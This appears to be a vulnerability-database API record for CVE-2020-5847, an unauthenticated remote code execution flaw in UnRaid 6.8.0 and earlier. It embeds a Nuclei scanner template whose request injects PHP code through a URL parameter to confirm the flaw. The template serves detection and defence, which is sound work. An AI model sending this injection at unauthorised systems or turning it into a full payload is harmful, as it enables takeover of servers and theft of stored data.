{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-5847/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-5847/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-5847/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-5847/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-5847/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-5847"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-5847"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2020/CVE-2020-5847.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2020-5847\n\ninfo:\n  name: UnRaid <=6.80 - Remote Code Execution\n  author: madrobot\n  severity: critical\n  description: UnRaid <=6.80 allows remote unauthenticated attackers to execute arbitrary code.\n  impact: |\n    Unauthenticated attackers can execute arbitrary code on UnRaid servers, leading to complete system compromise and access to all stored data.\n  remediation: |\n    Upgrade UnRaid to a version higher than 6.80 to mitigate the vulnerability.\n  reference:\n    - https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5847\n    - https://sysdream.com/news/lab/\n    - https://forums.unraid.net/forum/7-announcements/\n    - https://github.com/Ostorlab/KEV\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2020-5847\n    cwe-id: CWE-94,CWE-668\n    epss-score: 0.95844\n    epss-percentile: 0.99872\n    cpe: cpe:2.3:a:unraid:unraid:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: unraid\n    product: unraid\n  tags: cve2020,cve,rce,kev,unraid,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - \"b13928fbcfff659363d7c7d1ec008d56\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a004630440220767da63ccbb7cf64e4a49e7e35fdc6fdbbd68d50814ae59b77b402d8d9166c2802202a0e35e563a53e6f142e6a733be8c1e88b261d476cbd6c03dd962281874dc478:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2020-5847"
}